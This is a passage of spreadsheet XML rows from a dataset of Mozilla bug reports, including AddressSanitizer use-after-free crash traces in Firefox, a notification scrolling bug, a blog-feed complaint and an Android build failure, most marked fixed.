    #38 0x7fcdb2069d14 in XRE_InitChildProcess /builds/slave/m-cen-l64-asan-000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:575
    #39 0x48a9f1 in content_process_main /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/app/../contentproc/plugin-container.cpp:211
    #40 0x7fcda92a9d54 in __libc_start_main ??:?
    #41 0x489dcc in _start ??:?
0x606000274108 is located 8 bytes inside of 56-byte region [0x606000274100,0x606000274138)
freed by thread T0 (Web Content) here:
    #0 0x47265b in __interceptor_realloc _asan_rtl_
    #1 0x7fcdb7bf2a8d in moz_xrealloc /builds/slave/m-cen-l64-asan-000000000000000/build/src/memory/mozalloc/mozalloc.cpp:84
    #2 0x7fcdab51d6cf in Realloc /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/toolkit/mozapps/extensions/../../../dist/include/nsTArray.h:184
    #3 0x7fcdaff22642 in AppendElement&lt;mozilla::dom::indexedDB::IndexMetadata&gt; /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/indexedDB/../../dist/include/nsTArray.h:1330
    #4 0x7fcdaff2183e in CreateIndexInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/indexedDB/IDBObjectStore.cpp:1750
    #5 0x7fcdaff20fad in CreateIndex /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/indexedDB/IDBObjectStore.cpp:1682
    #6 0x7fcdae49e431 in createIndex /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/bindings/./IDBObjectStoreBinding.cpp:667
    #7 0x7fcdaf0c1643 in GenericBindingMethod /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/bindings/BindingUtils.cpp:2522
    #8 0x7fcdb3f5d270 in CallJSNative /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jscntxtinlines.h:226
    #9 0x7fcdb3f9a00e in Interpret /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:2558
    #10 0x7fcdb3f7dc89 in RunScript /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:448
    #11 0x7fcdb3f5d82a in Invoke /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:517
    #12 0x7fcdb3fa820e in Invoke /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:554
    #13 0x7fcdb3bbc99f in Call /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jsapi.cpp:4474
    #14 0x7fcdae02ee05 in Call /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/bindings/./EventHandlerBinding.cpp:259
    #15 0x7fcdaf3ca0d1 in Call&lt;nsISupports *&gt; /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/events/../../dist/include/mozilla/dom/EventHandlerBinding.h:350
    #16 0x7fcdaf3c83c2 in HandleEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/events/JSEventHandler.cpp:214
    #17 0x7fcdaf38beaf in HandleEventSubType /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/events/EventListenerManager.cpp:976
    #18 0x7fcdaf38dedf in HandleEventInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/events/EventListenerManager.cpp:1124
    #19 0x7fcdaf37d781 in HandleEventTargetChain /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/events/EventDispatcher.cpp:299
    #20 0x7fcdaf381a06 in Dispatch /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/events/EventDispatcher.cpp:633
    #21 0x7fcdaf342655 in DispatchDOMEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/events/EventDispatcher.cpp:697
    #22 0x7fcdaf35d7d9 in DispatchEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/events/DOMEventTargetHelper.cpp:251
    #23 0x7fcdafeced58 in DispatchSuccessEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/indexedDB/ActorsChild.cpp:751
    #24 0x7fcdafed1f39 in RecvPBackgroundIDBVersionChangeTransactionConstructor /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/indexedDB/ActorsChild.cpp:1406
    #25 0x7fcdabfbe66d in OnMessageReceived /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/ipc/ipdl/./PBackgroundIDBDatabaseChild.cpp:560
    #26 0x7fcdabf9839c in OnMessageReceived /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/ipc/ipdl/./PBackgroundChild.cpp:761
    #27 0x7fcdabf2a941 in DispatchAsyncMessage /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1231
    #28 0x7fcdabf201b5 in OnMaybeDequeueOne /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1142
    #29 0x7fcdabede3e4 in RunTask /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:361
previously allocated by thread T0 (Web Content) here:
    #0 0x4723e1 in __interceptor_malloc _asan_rtl_
    #1 0x7fcdb7bf27dd in moz_xmalloc /builds/slave/m-cen-l64-asan-000000000000000/build/src/memory/mozalloc/mozalloc.cpp:52
    #2 0x7fcdab51d5f3 in Malloc /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/toolkit/mozapps/extensions/../../../dist/include/nsTArray.h:181
    #3 0x7fcdaff22642 in AppendElement&lt;mozilla::dom::indexedDB::IndexMetadata&gt; /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/indexedDB/../../dist/include/nsTArray.h:1330
    #4 0x7fcdaff2183e in CreateIndexInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/indexedDB/IDBObjectStore.cpp:1750
    #5 0x7fcdaff20fad in CreateIndex /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/indexedDB/IDBObjectStore.cpp:1682
    #6 0x7fcdae49e431 in createIndex /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/bindings/./IDBObjectStoreBinding.cpp:667
    #7 0x7fcdaf0c1643 in GenericBindingMethod /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/bindings/BindingUtils.cpp:2522
    #8 0x7fcdb3f5d270 in CallJSNative /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jscntxtinlines.h:226
    #9 0x7fcdb3f9a00e in Interpret /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:2558
    #10 0x7fcdb3f7dc89 in RunScript /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:448
    #11 0x7fcdb3f5d82a in Invoke /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:517
    #12 0x7fcdb3fa820e in Invoke /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/vm/Interpreter.cpp:554
    #13 0x7fcdb3bbc99f in Call /builds/slave/m-cen-l64-asan-000000000000000/build/src/js/src/jsapi.cpp:4474
    #14 0x7fcdae02ee05 in Call /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/bindings/./EventHandlerBinding.cpp:259
    #15 0x7fcdaf3ca0d1 in Call&lt;nsISupports *&gt; /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/dom/events/../../dist/include/mozilla/dom/EventHandlerBinding.h:350
    #16 0x7fcdaf3c83c2 in HandleEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/events/JSEventHandler.cpp:214
    #17 0x7fcdaf38beaf in HandleEventSubType /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/events/EventListenerManager.cpp:976
    #18 0x7fcdaf38dedf in HandleEventInternal /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/events/EventListenerManager.cpp:1124
    #19 0x7fcdaf37d781 in HandleEventTargetChain /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/events/EventDispatcher.cpp:299
    #20 0x7fcdaf381a06 in Dispatch /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/events/EventDispatcher.cpp:633
    #21 0x7fcdaf342655 in DispatchDOMEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/events/EventDispatcher.cpp:697
    #22 0x7fcdaf35d7d9 in DispatchEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/events/DOMEventTargetHelper.cpp:251
    #23 0x7fcdafeced58 in DispatchSuccessEvent /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/indexedDB/ActorsChild.cpp:751
    #24 0x7fcdafed1f39 in RecvPBackgroundIDBVersionChangeTransactionConstructor /builds/slave/m-cen-l64-asan-000000000000000/build/src/dom/indexedDB/ActorsChild.cpp:1406
    #25 0x7fcdabfbe66d in OnMessageReceived /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/ipc/ipdl/./PBackgroundIDBDatabaseChild.cpp:560
    #26 0x7fcdabf9839c in OnMessageReceived /builds/slave/m-cen-l64-asan-000000000000000/build/src/obj-firefox/ipc/ipdl/./PBackgroundChild.cpp:761
    #27 0x7fcdabf2a941 in DispatchAsyncMessage /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1231
    #28 0x7fcdabf201b5 in OnMaybeDequeueOne /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/glue/MessageChannel.cpp:1142
    #29 0x7fcdabede3e4 in RunTask /builds/slave/m-cen-l64-asan-000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:361
SUMMARY: AddressSanitizer: heap-use-after-free ??:0 ??
Shadow bytes around the buggy address:
  0x0c0c800467d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c800467e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c800467f0: fa fa fa fa fa fa fa fa fa fa fa fa 00 00 00 00
  0x0c0c80046800: 00 00 00 fa fa fa fa fa fd fd fd fd fd fd fd fa
  0x0c0c80046810: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa
=&gt;0x0c0c80046820: fd[fd]fd fd fd fd fd fa fa fa fa fa 00 00 00 00
  0x0c0c80046830: 00 00 00 00 fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c0c80046840: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c0c80046850: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00
  0x0c0c80046860: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c0c80046870: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       ==2401==ABORTING
p.s. Please let me know if something's wrong it's my first time with open source
Actual results:
It crashes
Expected results:
It should create index</t>
        </is>
      </c>
      <c r="X3637" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3638">
      <c r="A3638" t="n">
        <v>897874</v>
      </c>
      <c r="B3638" t="inlineStr">
        <is>
          <t>2013-07-25 00:40:15 -0700</t>
        </is>
      </c>
      <c r="C3638" t="inlineStr">
        <is>
          <t>[Notification] horizontally scrollable with many CB messages</t>
        </is>
      </c>
      <c r="D3638" t="inlineStr">
        <is>
          <t>2013-08-07 20:19:11 -0700</t>
        </is>
      </c>
      <c r="E3638" t="n">
        <v>1</v>
      </c>
      <c r="F3638" t="n">
        <v>1</v>
      </c>
      <c r="G3638" t="n">
        <v>6</v>
      </c>
      <c r="H3638" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3638" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J3638" t="inlineStr">
        <is>
          <t>Gaia::System</t>
        </is>
      </c>
      <c r="K3638" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3638" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M3638" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N3638" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3638" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3638" t="inlineStr">
        <is>
          <t>[TD-68830] [LeoVB+]</t>
        </is>
      </c>
      <c r="Q3638" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3638" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3638" t="inlineStr">
        <is>
          <t>1.1 QE5</t>
        </is>
      </c>
      <c r="T3638" t="n">
        <v>1</v>
      </c>
      <c r="U3638" t="n">
        <v>0</v>
      </c>
      <c r="V3638" t="n">
        <v>18</v>
      </c>
      <c r="W3638" t="inlineStr">
        <is>
          <t>Created attachment 780845
Repro video
When there are many CB messages on notification panel, 
the notification panel becomes horizontally scrollable.
The notification item was swiped away to get deleted, however 
the notification panel scrolled horizontally.
It was reported that this issue is not reproducible with SMS, but is reproducible with CB messages.</t>
        </is>
      </c>
      <c r="X3638" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3639">
      <c r="A3639" t="n">
        <v>916404</v>
      </c>
      <c r="B3639" t="inlineStr">
        <is>
          <t>2013-09-13 21:47:26 -0700</t>
        </is>
      </c>
      <c r="C3639" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsContentUtils::ContentIsHostIncludingDescendantOf</t>
        </is>
      </c>
      <c r="D3639" t="inlineStr">
        <is>
          <t>2024-05-30 08:07:28 -0700</t>
        </is>
      </c>
      <c r="E3639" t="n">
        <v>1</v>
      </c>
      <c r="F3639" t="n">
        <v>1</v>
      </c>
      <c r="G3639" t="n">
        <v>3</v>
      </c>
      <c r="H3639" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3639" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3639" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3639" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3639" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3639" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3639" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3639" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3639" t="inlineStr">
        <is>
          <t>[asan][adv-main25+][adv-esr24-1+]</t>
        </is>
      </c>
      <c r="Q3639" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3639" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3639" t="inlineStr">
        <is>
          <t>mozilla27</t>
        </is>
      </c>
      <c r="T3639" t="n">
        <v>1</v>
      </c>
      <c r="U3639" t="n">
        <v>0</v>
      </c>
      <c r="V3639" t="n">
        <v>23</v>
      </c>
      <c r="W3639" t="inlineStr">
        <is>
          <t>Created attachment 804830
Testcase
Need to install Jesse's fuzzPriv extension.
&gt;==19928==ERROR: AddressSanitizer: heap-use-after-free on address 0x6160020b5520 at pc 0x7f18a8bb0b38 bp 0x7fff1ca5cc20 sp 0x7fff1ca5cc18
&gt;READ of size 8 at 0x6160020b5520 thread T0
&gt;    #0 0x7f18a8bb0b37 in get objdir-ff-asan/content/base/src/../../../dist/include/nsCOMPtr.h:800
&gt;    #1 0x7f18a8bb0b37 in operator-&gt; objdir-ff-asan/content/base/src/../../../dist/include/nsCOMPtr.h:820
&gt;    #2 0x7f18a8bb0b37 in NodeType objdir-ff-asan/content/base/src/../../../dist/include/nsINode.h:506
&gt;    #3 0x7f18a8bb0b37 in nsContentUtils::ContentIsHostIncludingDescendantOf(nsINode const*, nsINode const*) content/base/src/nsContentUtils.cpp:1862
&gt;    #4 0x7f18a8d15a72 in IsAllowedAsChild(nsIContent*, nsINode*, bool, nsINode*) content/base/src/nsINode.cpp:1542
&gt;    #5 0x7f18a8d12720 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&amp;) content/base/src/nsINode.cpp:1747
&gt;    #6 0x7f18ab855e25 in InsertBefore objdir-ff-asan/dom/bindings/../../dist/include/nsINode.h:1515
&gt;    #7 0x7f18ab855e25 in mozilla::dom::NodeBinding::insertBefore(JSContext*, JS::Handle&lt;JSObject*&gt;, nsINode*, JSJitMethodCallArgs const&amp;) objdir-ff-asan/dom/bindings/NodeBinding.cpp:477
&gt;    #8 0x7f18ab84d7fe in mozilla::dom::NodeBinding::genericMethod(JSContext*, unsigned int, JS::Value*) objdir-ff-asan/dom/bindings/NodeBinding.cpp:1230
&gt;    #9 0x7f18ad83247a in native js/src/jscntxtinlines.h:218
&gt;    #10 0x7f18ad83247a in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:478
&gt;    #11 0x7f18ad8257f7 in Interpret(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:2454
&gt;    #12 0x7f18ad813ff1 in js::RunScript(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:435
&gt;    #13 0x7f18ad8346fb in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::AbstractFramePtr, JS::Value*) js/src/vm/Interpreter.cpp:619
&gt;    #14 0x7f18ad834a56 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) js/src/vm/Interpreter.cpp:655
&gt;    #15 0x7f18ada25f6d in JS::Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions, unsigned short const*, unsigned long, JS::Value*) js/src/jsapi.cpp:4897
&gt;    #16 0x7f18a961f8eb in nsJSUtils::EvaluateString(JSContext*, nsAString_internal const&amp;, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions&amp;, nsJSUtils::EvaluateOptions&amp;, JS::Value*, void**) dom/base/nsJSUtils.cpp:280
&gt;    #17 0x7f18a960d71f in nsJSContext::EvaluateString(nsAString_internal const&amp;, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions&amp;, bool, JS::Value*, void**) dom/base/nsJSEnvironment.cpp:994
&gt;    #18 0x7f18a95cb7a4 in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) dom/base/nsGlobalWindow.cpp:10489
&gt;    #19 0x7f18a95aff22 in nsGlobalWindow::RunTimeout(nsTimeout*) dom/base/nsGlobalWindow.cpp:10733
&gt;    #20 0x7f18a95ca9bc in nsGlobalWindow::TimerCallback(nsITimer*, void*) dom/base/nsGlobalWindow.cpp:10980
&gt;    #21 0x7f18abff59d1 in nsTimerImpl::Fire() xpcom/threads/nsTimerImpl.cpp:546
&gt;    #22 0x7f18abff6076 in nsTimerEvent::Run() xpcom/threads/nsTimerImpl.cpp:630
&gt;    #23 0x7f18abfebb29 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:622
&gt;    #24 0x7f18abf13601 in NS_ProcessNextEvent(nsIThread*, bool) objdir-ff-asan/xpcom/build/nsThreadUtils.cpp:238
&gt;    #25 0x7f18aacaaf30 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:116
&gt;    #26 0x7f18ac105363 in RunInternal ipc/chromium/src/base/message_loop.cc:220
&gt;    #27 0x7f18ac105363 in RunHandler ipc/chromium/src/base/message_loop.cc:213
&gt;    #28 0x7f18ac105363 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:187
&gt;    #29 0x7f18aaa94e2c in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:161
&gt;    #30 0x7f18aa48318e in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:269
&gt;    #31 0x7f18a78842f0 in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:3869
&gt;    #32 0x7f18a788522a in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:3937
&gt;    #33 0x7f18a788615b in XRE_main toolkit/xre/nsAppRunner.cpp:4139
&gt;    #34 0x45524d in do_main browser/app/nsBrowserApp.cpp:275
&gt;    #35 0x45524d in main browser/app/nsBrowserApp.cpp:635
&gt;    #36 0x7f18b6b4976c in
&gt;    #37 0x45483c in _start
&gt;0x6160020b5520 is located 32 bytes inside of 144-byte region [0x6160020b5500,0x6160020b5590)
&gt;freed by thread T0 here:
&gt;    #0 0x441785 in free _asan_rtl_
&gt;    #1 0x7f18ac012144 in SnowWhiteKiller::~SnowWhiteKiller() xpcom/base/nsCycleCollector.cpp:1993
&gt;    #2 0x7f18ac00967e in nsCycleCollector_doDeferredDeletion() xpcom/base/nsCycleCollector.cpp:3153
&gt;    #3 0x7f18abfebb29 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:622
&gt;    #4 0x7f18abf13601 in NS_ProcessNextEvent(nsIThread*, bool) objdir-ff-asan/xpcom/build/nsThreadUtils.cpp:238
&gt;    #5 0x7f18aacaaf51 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:81
&gt;    #6 0x7f18ac105363 in RunInternal ipc/chromium/src/base/message_loop.cc:220
&gt;    #7 0x7f18ac105363 in RunHandler ipc/chromium/src/base/message_loop.cc:213
&gt;    #8 0x7f18ac105363 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:187
&gt;    #9 0x7f18aaa94e2c in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:161
&gt;    #10 0x7f18a788522a in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:3937
&gt;    #11 0x7f18a788615b in XRE_main toolkit/xre/nsAppRunner.cpp:4139
&gt;    #12 0x45524d in do_main browser/app/nsBrowserApp.cpp:275
&gt;    #13 0x45524d in main browser/app/nsBrowserApp.cpp:635
&gt;    #14 0x7f18b6b4976c in
&gt;previously allocated by thread T0 here:
&gt;    #0 0x4418c5 in malloc _asan_rtl_
&gt;    #1 0x7f18b7f044e8 in moz_xmalloc memory/mozalloc/mozalloc.cpp:54
&gt;Shadow bytes around the buggy address:
&gt;  0x0c2c8040ea50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
&gt;  0x0c2c8040ea60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x0c2c8040ea70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x0c2c8040ea80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x0c2c8040ea90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;=&gt;0x0c2c8040eaa0: fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd
&gt;  0x0c2c8040eab0: fd fd fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x0c2c8040eac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x0c2c8040ead0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x0c2c8040eae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x0c2c8040eaf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;Shadow byte legend (one shadow byte represents 8 application bytes):
&gt;  Addressable:           00
&gt;  Partially addressable: 01 02 03 04 05 06 07
&gt;  Heap left redzone:     fa
&gt;  Heap right redzone:    fb
&gt;  Freed heap region:     fd
&gt;  Stack left redzone:    f1
&gt;  Stack mid redzone:     f2
&gt;  Stack right redzone:   f3
&gt;  Stack partial redzone: f4
&gt;  Stack after return:    f5
&gt;  Stack use after scope: f8
&gt;  Global redzone:        f9
&gt;  Global init order:     f6
&gt;  Poisoned by user:      f7
&gt;  ASan internal:         fe
&gt;==19928==ABORTING
&gt;
&gt;</t>
        </is>
      </c>
      <c r="X3639" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3640">
      <c r="A3640" t="n">
        <v>451505</v>
      </c>
      <c r="B3640" t="inlineStr">
        <is>
          <t>2008-08-20 23:17:18 -0700</t>
        </is>
      </c>
      <c r="C3640" t="inlineStr">
        <is>
          <t>devmo blogs should only advertise one feed, and shouldn't misstate what it is</t>
        </is>
      </c>
      <c r="D3640" t="inlineStr">
        <is>
          <t>2020-05-15 11:43:12 -0700</t>
        </is>
      </c>
      <c r="E3640" t="n">
        <v>1</v>
      </c>
      <c r="F3640" t="n">
        <v>1</v>
      </c>
      <c r="G3640" t="n">
        <v>6</v>
      </c>
      <c r="H3640" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3640" t="inlineStr">
        <is>
          <t>developer.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J3640" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3640" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3640" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3640" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3640" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3640" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3640" t="inlineStr"/>
      <c r="Q3640" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3640" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3640" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3640" t="n">
        <v>1</v>
      </c>
      <c r="U3640" t="n">
        <v>0</v>
      </c>
      <c r="V3640" t="n">
        <v>7</v>
      </c>
      <c r="W3640" t="inlineStr">
        <is>
          <t>I'm guessing from the outside that there's a single template used for all the blogs on devmo, since the new web-tech one has feed autodiscovery links that are several years old. They all seem to have &lt;link&gt;s for RSS 2.0, RSS 0.92, and "Atom 0.3" (which is actually Atom, the proper name for Atom 1.0).
The RSS 0.92 link is pointless - it's something that nobody wants, only serving to sow confusion like the confusion where that feed ended up being added to planet.mozilla.org, only to discover that it's crap that lacks full content.
The choice between RSS 2.0 and Atom is not something that an end user should be asked to make. If their client doesn't support both, it's broken. Other than politics, the choice for which one to offer boils down to whether you want the interpretation of "&lt;foo&gt;" in a title (is that HTML that should be rendered, or is it text that the reader should see as "&lt;foo&gt;"?) to be based on an unambiguous RFC, as it is for Atom, or on each client programs author's interpretation of a couple of intentionally vague blog posts, the average of what other programs do, and maybe some sheep entrails, as it is for RSS 2.0.
Expected results:
A single autodiscovery link, pointing to the Atom feed, with the title "Atom feed".</t>
        </is>
      </c>
      <c r="X3640" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3641">
      <c r="A3641" t="n">
        <v>1549416</v>
      </c>
      <c r="B3641" t="inlineStr">
        <is>
          <t>2019-05-06 08:47:34 -0700</t>
        </is>
      </c>
      <c r="C3641" t="inlineStr">
        <is>
          <t>Android 64b build failing</t>
        </is>
      </c>
      <c r="D3641" t="inlineStr">
        <is>
          <t>2019-06-28 15:30:47 -0700</t>
        </is>
      </c>
      <c r="E3641" t="n">
        <v>1</v>
      </c>
      <c r="F3641" t="n">
        <v>1</v>
      </c>
      <c r="G3641" t="n">
        <v>3</v>
      </c>
      <c r="H3641" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3641" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="J3641" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="K3641" t="inlineStr">
        <is>
          <t>4.21</t>
        </is>
      </c>
      <c r="L3641" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3641" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N3641" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3641" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3641" t="inlineStr"/>
      <c r="Q3641" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3641" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3641" t="inlineStr">
        <is>
          <t>4.22</t>
        </is>
      </c>
      <c r="T3641" t="n">
        <v>1</v>
      </c>
      <c r="U3641" t="n">
        <v>0</v>
      </c>
      <c r="V3641" t="n">
        <v>10</v>
      </c>
      <c r="W3641" t="inlineStr">
        <is>
          <t>Patch incoming</t>
        </is>
      </c>
      <c r="X3641" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3642">
      <c r="A3642" t="n">
        <v>1659035</v>
      </c>
      <c r="B3642" t="inlineStr">
        <is>
          <t>2020-08-13 20:25:03 -0700</t>
        </is>
      </c>
      <c r="C3642" t="inlineStr">
        <is>
          <t>Reflected XSS on resource:// by accessing error page templates in Fenix directly</t>
        </is>
      </c>
      <c r="D3642" t="inlineStr">
        <is>
          <t>2024-05-30 10:17:59 -0700</t>
        </is>
      </c>
      <c r="E3642" t="n">
        <v>1</v>
      </c>
      <c r="F3642" t="n">
        <v>1</v>
      </c>
      <c r="G3642" t="n">
        <v>2</v>
      </c>
      <c r="H3642" t="inlineStr">
